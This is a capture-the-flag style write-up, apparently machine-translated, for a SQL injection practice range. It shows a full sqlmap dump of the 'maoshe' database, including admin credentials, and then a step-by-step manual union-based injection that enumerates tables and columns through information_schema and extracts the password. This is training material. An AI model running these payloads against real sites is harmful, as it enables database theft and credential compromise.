Location>code7788 >text

SQL Injection Target Range (Catshed) Manual Injection

Popularity:453 ℃/2024-10-13 11:50:53

SQL Injection Target Range (Catshed) Manual Injection

Range address /?id=1

Using Scripts

  • You could just use a sqlmap script to test the address directly, but that's just not fun.
  • Here we are using sqlmap and the secondary sqlmapplus script, sqlmap, is the same.
sqlmapX -u "/?id=1" -D "maoshe" --dump --batch --random-agent
        ___
       __H__
 ___ ___["]_____ ___ ___ {1.8#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
      |_|V...       |_|

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:46:16 /2024-10-12/

[20:46:16] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12' from file '/home/kali/tools/SqlmapXPlus/data/txt/'
[20:46:17] [INFO] resuming back-end DBMS 'mysql'
[20:46:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 8425=8425

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 3539 FROM (SELECT(SLEEP(5)))tWAV)
---
[20:46:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0.12
[20:46:17] [INFO] fetching tables for database: 'maoshe'
[20:46:17] [INFO] fetching number of tables for database 'maoshe'
[20:46:17] [INFO] resumed: 4
[20:46:17] [INFO] resumed: admin
[20:46:17] [INFO] resumed: dirs
[20:46:17] [INFO] resumed: news
[20:46:17] [INFO] resumed: xss
[20:46:17] [INFO] fetching columns for table 'admin' in database 'maoshe'
[20:46:17] [INFO] resumed: 3
[20:46:17] [INFO] resumed: Id
[20:46:17] [INFO] resumed: username
[20:46:17] [INFO] resumed: password
[20:46:17] [INFO] fetching entries for table 'admin' in database 'maoshe'
[20:46:17] [INFO] fetching number of entries for table 'admin' in database 'maoshe'
[20:46:17] [INFO] resumed: 2
[20:46:17] [INFO] resumed: 1
[20:46:17] [INFO] resumed: hellohack
[20:46:17] [INFO] resumed: admin
[20:46:17] [INFO] resumed: 2
[20:46:17] [INFO] resumed: zkaqbanban
[20:46:17] [INFO] resumed: ppt
Database: maoshe
Table: admin
[2 entries]
+----+------------+----------+
| Id | password | username |
+----+------------+----------+
| 1 | hellohack | admin | ## It's been found here. flag
| 2 | zkaqbanban | ppt |
+----+------------+----------+

[20:46:17] [INFO] table 'maoshe.`admin`' dumped to CSV file '/home/kali/.local/share/sqlmap/output//dump/maoshe/'
[20:46:17] [INFO] fetching columns for table 'xss' in database 'maoshe'
[20:46:17] [INFO] resumed: 3
[20:46:17] [INFO] resumed: id
[20:46:17] [INFO] resumed: user
[20:46:17] [INFO] resumed: pass
[20:46:17] [INFO] fetching entries for table 'xss' in database 'maoshe'
[20:46:17] [INFO] fetching number of entries for table 'xss' in database 'maoshe'
[20:46:17] [INFO] resumed: 0
[20:46:17] [WARNING] table 'xss' in database 'maoshe' appears to be empty
Database: maoshe
Table: xss
[0 entries]
+----+------+--------+
| id | pass | user |
+----+------+--------+
+----+------+--------+

[20:46:17] [INFO] table '' dumped to CSV file '/home/kali/.local/share/sqlmap/output//dump/maoshe/'
[20:46:17] [INFO] fetching columns for table 'news' in database 'maoshe'
[20:46:17] [INFO] resumed: 2
[20:46:17] [INFO] resumed: id
[20:46:17] [INFO] resumed: content
[20:46:17] [INFO] fetching entries for table 'news' in database 'maoshe'
[20:46:17] [INFO] fetching number of entries for table 'news' in database 'maoshe'
[20:46:17] [INFO] resumed: 3
[20:46:17] [INFO] resumed: <div class="spacer"></div><div class="item"><div class="title">
[20:46:17] [INFO] resumed: 1
[20:46:17] [INFO] resumed: <h1>
[20:46:17] [INFO] resumed: 2
[20:46:17] [INFO] resumed: <h1>
[20:46:17] [INFO] resumed: 3
Database: maoshe
Table: news
[3 entries]
+----+-----------------------------------------------------------------+
| id | content |
+----+-----------------------------------------------------------------+
| 1 | <div class="spacer"></div><div class="item"><div class="title"> |
| 2 | <h1> |
| 3 | <h1> |
+----+-----------------------------------------------------------------+

[20:46:18] [INFO] table '' dumped to CSV file '/home/kali/.local/share/sqlmap/output//dump/maoshe/'
[20:46:18] [INFO] fetching columns for table 'dirs' in database 'maoshe'
[20:46:18] [INFO] resumed: 1
[20:46:18] [INFO] resumed: paths
[20:46:18] [INFO] fetching entries for table 'dirs' in database 'maoshe'
[20:46:18] [INFO] fetching number of entries for table 'dirs' in database 'maoshe'
[20:46:18] [INFO] resumed: 0
[20:46:18] [WARNING] table 'dirs' in database 'maoshe' appears to be empty
Database: maoshe
Table: dirs
[0 entries]
+-------+
| paths |
+-------+
+-------+

[20:46:18] [INFO] table '' dumped to CSV file '/home/kali/.local/share/sqlmap/output//dump/maoshe/'
[20:46:18] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/'

[*] ending @ 20:46:18 /2024-10-12/

manual injection

Determining if a SQL Injection Vulnerability Exists

  • Construct and 1 = 1, this statement is constant, the general page is not reported as an error

  • Try 1=2.
  • There's an error here, which means there's an injection vulnerability.

Using the order by statement to determine the number of database fields

  • tectonic (geology)?id=1 and 1=1 order by 1 No change in the page (order by 1 means sort by the first column, and that's generally how it defaults to ascending order as well)
  • Then construct order by 2 / order by 3 sequentially.
  • By the syntax of MySQL, the data after the order by will report an error if the number of columns exceeds the number of columns, so use a method to determine how many fields there are in total.


  • order by 1/order by 2 are fine, but order by 3 is wrong.

Using a Union Query to Determine Return Points

  • Back to the point is in the page can show the database information in the plate, such as some web pages in the "number of times", "release time", etc., are the response to the data in the database.
  • In the MySQL statement, the page can only display one line of the query at a time, and it's checked before it's displayed, so we need to invalidate the previous statement ?id=1 and 1=1 to display the statementunion select 1,2content
  • So we let the previous command report the error as undisplayable, i.e., construct ?id=1 and 1=2, followed by the usualunion select 1,2

Querying related data using a return point

  1. Query the name of the current database
  • Knowing that 2 is a return point, we just need to replace 2 with the name of the part we want to query in the union query
  • You can query the current database name, replacing 2 with database()
  • tectonic (geology)id=1 and 1=2 union select 1,database()
  • Database name maoshe
  1. Query the table name in the database
  • tectonic (geology)?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
  • limit 0,1 means start from 0, query the first data

  • Just change the limit 0,1 /limit 1,1/limit 2,1 at the end to see the table name at the end.
  • The tables in the database behind the description are admin, dirs, news, xss.
  • And when it's followed by limit 4,1, it's blank, which means there's only four tables, and the administrator's information is usually in admin.
  1. Querying the column names of the admin table
  • tectonic (geology)?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1
  • Similarly, if you change the limit 0,1, you'll see that the next columns are: the first is id, the second is username, and the third is password.
  • Now that all the information has been found, it's just a direct query.
  1. Searching for the required information
  • tectonic (geology)?id=1 and 1=2 union select 1,username from admin
  • tectonic (geology)?id=1 and 1=2 union select 1,password from admin where username = 'admin'

close

  • Flag, I've got it. That's the administrator's password, hellohack.
<Previous Next>